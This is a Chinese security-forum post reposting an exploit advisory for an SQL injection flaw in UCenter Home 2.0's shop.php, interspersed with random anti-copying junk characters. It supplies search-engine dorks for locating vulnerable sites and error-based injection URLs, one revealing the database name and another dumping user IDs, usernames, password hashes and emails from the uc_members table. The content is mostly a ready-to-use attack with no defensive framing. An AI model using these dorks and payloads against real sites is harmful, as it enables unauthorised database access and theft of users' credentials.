找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2012|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
2 Z; |7 d5 r. x( D! N
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  9 W" N/ }: y, b$ B, ?' ]

" @1 O. @# n( A$ i1 S1 M. _9 i                                 $ ^* c: N# W/ h% U. K
$ q" e) l8 k# q4 U9 X4 A1 ]6 I
*/ Author : KnocKout  & J8 a: o) p( q# z9 F4 v+ b
8 X" J5 a: _- O6 q/ K/ M
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  
& n- ?8 r  g% r
/ y3 L+ u) ?$ u# B: a; u! y3 P0 u*/ Contact: knockoutr@msn.com  
# G2 c) S; P4 j7 |$ w& Z2 ^) g7 ^
. g! j7 C" T- A*/ Cyber-Warrior.org/CWKnocKout  
, K1 m" z) Q2 g3 G' q: n. |: C6 {1 @
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  & V- r% Y6 ?1 n2 k2 @* n" W

2 z: t, C, \6 f' j( }Script : UCenter Home  
/ l" v0 D& ?% e% U( A' ?4 k- t" K3 ]& d+ j  a
Version : 2.0  ( H, b" ?0 B8 E( s' ]1 U: l% L

: s& T; v0 X4 d; z. |Script HomePage : http://u.discuz.net/  ! H+ Q6 r' n& e
+ o; [9 f8 M8 Y7 [, j
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  5 O) @( i/ E* V5 S/ D3 `
* [4 W, R6 A7 J- T: w! R/ i
Dork : Powered by UCenter inurl:shop.php?ac=view  
6 g: c3 [$ x, P# K5 C9 G. K9 X
, a5 e& ?; T3 w/ d4 j& f/ DDork 2 : inurl:shop.php?ac=view&shopid=  
+ ]4 `4 X; e' C7 f) e5 r1 T8 ]3 |, c8 m* `$ ]
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
8 J, ?2 u3 _  E/ o9 P( M* g" h  }, P  t+ g8 x/ _/ |/ x. k
Vuln file : Shop.php  
& F1 O" x4 X$ R$ K) F8 M5 L+ x5 M" g' _' t" m8 H
value's : (?)ac=view&shopid=  7 Q2 o- v' Y2 t* I
2 h4 r+ r& u/ |
Vulnerable Style : SQL Injection (MySQL Error Based)  
  m8 _7 C. ]! b$ c8 k) f9 j/ ?9 |" S% {4 R
Need Metarials : Hex Conversion  - v2 |8 D, [- N6 q
6 a  g2 y5 v2 o  y  {
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ( y+ W. a/ c7 b+ w! g

- P) i: J9 W5 s& \* C# F2 ^2 wYour Need victim Database name.   0 y. r3 l+ e1 J- @/ s/ J6 V
' \5 e% \5 E1 u2 [/ @( D/ H
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
* W1 ^) H. I# ~$ r9 ], d1 c" e3 g
; F/ {, ~% a( |$ ~4 \5 T  C2 v..  : V9 O5 E' J. I: ^7 w
0 X: j# l) v; Y+ x. {; V1 y
DB : Okey.  * Y2 m1 D) F, r6 A  z+ T
8 J4 i6 Q. k! y/ b: I# G3 J
your edit DB `[TARGET DB NAME]`  
& |7 R# P' q% X2 u) ]2 Q/ {5 X( O$ S/ a0 t# @3 ?( j/ B
Example : 'hiwir1_ucenter'  % x+ V' C9 c# u& r) E4 Q& a6 I- ?
4 Q5 S: U& ^  |0 ~+ {  w) Z( I( D
Edit : Okey.  # `* B' \' {, x1 |& Z) d$ l
/ A# Z+ i( s  Z5 r, X
Your use Hex conversion. And edit Your SQL Injection Exploit..  
3 u1 R& J. Q  y) @' @* h6 ~- `6 U# u
   1 a7 \6 T3 I$ ]4 ^

& y7 R3 _3 ?6 l9 ~" X* a) ZExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  - u4 m: W0 e3 p, q& ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表